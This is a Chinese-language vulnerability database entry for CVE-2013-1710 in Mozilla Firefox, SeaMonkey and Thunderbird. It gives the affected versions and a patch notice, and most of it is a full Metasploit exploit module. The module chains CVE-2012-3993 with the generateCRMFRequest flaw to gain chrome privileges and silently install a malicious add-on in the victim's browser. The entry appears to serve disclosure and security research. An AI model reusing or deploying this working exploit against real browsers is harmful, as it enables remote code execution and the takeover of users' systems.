Lucene search

RootSSV:61208

HistoryDec 25, 2013 - 12:00 a.m.

Mozilla Firefox/SeaMonkey/Thunderbird CRMF请求生成跨站脚本漏洞

2013-12-2500:00:00

Root

www.seebug.org

0.927 High

EPSS

Percentile

99.0%

JSON

BUGTRAQ ID：61641
CVE ID：CVE-2013-1710

Mozilla Firefox/SeaMonkey/Thunderbird是Mozilla所发布的WEB浏览器/新闻组客户端/邮件客户端。

Mozilla Firefox/SeaMonkey/Thunderbird crypto.generateCRMFRequest函数存在安全漏洞，允许远程攻击者在某些情况下生成证书请求消息格式(Certificate Request Message Format)请求来执行任意Javascript代码或进行跨站脚本攻击。
0
Mozilla Firefox < 23.0
mozilla Firefox ESR 17.x
mozilla Thunderbird < 17.0.8
mozilla Thunderbird ESR 17.x
mozilla SeaMonkey < 2.20
厂商补丁：

Mozilla

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org


                                                ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 &lt; Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::FirefoxAddonGenerator
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           =&gt; 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
      'Description'    =&gt; %q{
        On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
        invalid input, would throw an exception that did not have an __exposedProps__
        property set. By re-setting this property on the exception object's prototype,
        the chrome-based defineProperty method is made available.
 
        With the defineProperty method, functions belonging to window and document can be
        overriden with a function that gets called from chrome-privileged context. From here,
        another vulnerability in the crypto.generateCRMFRequest function is used to &quot;peek&quot;
        into the context's private scope. Since the window does not have a chrome:// URL,
        the insecure parts of Components.classes are not available, so instead the AddonManager
        API is invoked to silently install a malicious plugin.
      },
      'License' =&gt; MSF_LICENSE,
      'Author'  =&gt; [
        'Mariusz Mlynski', # discovered CVE-2012-3993
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'joev' # metasploit module
      ],
      'DisclosureDate' =&gt; &quot;Aug 6 2013&quot;,
      'References' =&gt; [
        ['CVE', '2012-3993'],  # used to install function that gets called from chrome:// (ff&lt;15)
        ['OSVDB', '86111'],
        ['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
        ['CVE', '2013-1710'],  # used to peek into privileged caller's closure (ff&lt;23)
        ['OSVDB', '96019']
      ],
      'BrowserRequirements' =&gt; {
        :source  =&gt; 'script',
        :ua_name =&gt; HttpClients::FF,
        :ua_ver  =&gt; lambda { |ver| ver.to_i.between?(5, 15) }
      }
    ))
 
    register_options([
      OptString.new('CONTENT', [ false, &quot;Content to display inside the HTML &lt;body&gt;.&quot;, '' ] )
    ], self.class)
  end
 
  def on_request_exploit(cli, request, target_info)
    if request.uri.match(/\.xpi$/i)
      print_status(&quot;Sending the malicious addon&quot;)
      send_response(cli, generate_addon_xpi.pack, { 'Content-Type' =&gt; 'application/x-xpinstall' })
    else
      print_status(&quot;Sending HTML&quot;)
      send_response_html(cli, generate_html(target_info))
    end
  end
 
  def generate_html(target_info)
    injection = if target_info[:ua_ver].to_i == 15
      &quot;Function.prototype.call.call(p.__defineGetter__,obj,key,runme);&quot;
    else
      &quot;p2.constructor.defineProperty(obj,key,{get:runme});&quot;
    end
 
    %Q|
      &lt;html&gt;
      &lt;body&gt;
      #{datastore['CONTENT']}
      &lt;div id='payload' style='display:none'&gt;
      if (!window.done){
        window.AddonManager.getInstallForURL(
          '#{get_module_uri}/addon.xpi',
          function(install) { install.install() },
          'application/x-xpinstall'
        );
        window.done = true;
      }
      &lt;/div&gt;
      &lt;script&gt;
      try{InstallTrigger.install(0)}catch(e){p=e;};
      var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
      p2.__exposedProps__={
        constructor:'rw',
        prototype:'rw',
        defineProperty:'rw',
        __exposedProps__:'rw'
      };
      var s = document.querySelector('#payload').innerHTML;
      var q = false;
      var register = function(obj,key) {
        var runme = function(){
          if (q) return;
          q = true;
          window.crypto.generateCRMFRequest(&quot;CN=Me&quot;, &quot;foo&quot;, &quot;bar&quot;, null, s, 384, null, &quot;rsa-ex&quot;);
        };
        try {
          #{injection}
        } catch (e) {}
      };
      for (var i in window) register(window, i);
      for (var i in document) register(document, i);
      &lt;/script&gt;
      &lt;/body&gt;
      &lt;/html&gt;
    |
  end
end